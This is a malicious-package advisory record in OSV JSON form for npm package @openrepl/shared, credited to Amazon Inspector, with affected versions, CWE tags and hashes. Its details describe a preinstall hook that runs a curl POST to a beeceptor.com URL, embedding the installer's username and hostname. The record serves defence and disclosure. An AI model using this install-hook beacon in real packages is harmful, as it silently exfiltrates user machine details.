MAL-2026-14057Malicious code in @openrepl/shared (npm)
| Ecosystem | Package | Version |
|---|---|---|
| npm | @openrepl/shared | 0.0.4 |
| npm | @openrepl/shared | 0.0.5 |
{"modified":"2026-08-15T16:10:01Z","published":"2026-08-15T15:58:33Z","schema_version":"1.7.4","id":"MAL-2026-14057","summary":"Malicious code in @openrepl/shared (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (2fcd297122e7aac00cd0d3d92fcb5f1fc00b6c558571a037b5447eb64bd443b8)\npackage.json declares a preinstall hook (`node index.js`) that runs automatically on `npm install`. index.js shells out via `child_process` to execute `curl -X POST` against `https://youjoex.free.beeceptor.com/$(whoami)/$(hostname)`, embedding the installer's OS username and hostname (captured via command substitution) in the URL path. beeceptor.com is a public request-inspection service commonly used as a low-effort exfiltration sink. The package advertises no functionality that would justify this network beacon and ships no other library code consistent with its `shared` name.\n","affected":[{"package":{"ecosystem":"npm","name":"@openrepl/shared"},"versions":["0.0.5","0.0.4"],"database_specific":{"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"indicators":{"evidence_files":[{"path":"index.js","sha256":"95f3a06183c1303e12e3c4914662eb3d9fdd74911212724a83442b7ce0009c29","tlsh":"4ee0720a5cf9483a327218a4e908181f7b4bca00023bf082dc8a082013d886882281e3"}],"package_integrity":[{"filename":"shared-0.0.5.tgz","hashes":{"sha1":"cff64d50a45e2f0e50babffdd68c896092c2af6d","sha512_sri":"sha512-LCpOC9M9P3ub8SF6MDp83qcAkp9QbBU41C/hATKpSGTU7hqe8fMQYu71WQ8lOzBKyQI1EDH3Ye3CHM+VXajODg=="}}]}}}],"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@openrepl/shared/v/0.0.5"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@openrepl/shared/v/0.0.4"}],"credits":[{"name":"Amazon Inspector","type":"FINDER","contact":["inspector-research@amazon.com"]}],"database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-017965","import_time":"2026-08-15T16:07:57.008737654Z","modified_time":"2026-08-15T15:58:33Z","sha256":"2fcd297122e7aac00cd0d3d92fcb5f1fc00b6c558571a037b5447eb64bd443b8","source":"amazon-inspector","versions":["0.0.5"]},{"id":"IN-MAL-2026-017966","import_time":"2026-08-15T16:07:57.086040823Z","modified_time":"2026-08-15T15:58:40Z","sha256":"aabd8862a4910812bd95dde0681670548ea04386d70674032057229927497e12","source":"amazon-inspector","versions":["0.0.4"]}]}}数据来源:OpenSSF Malicious Packages · Apache-2.0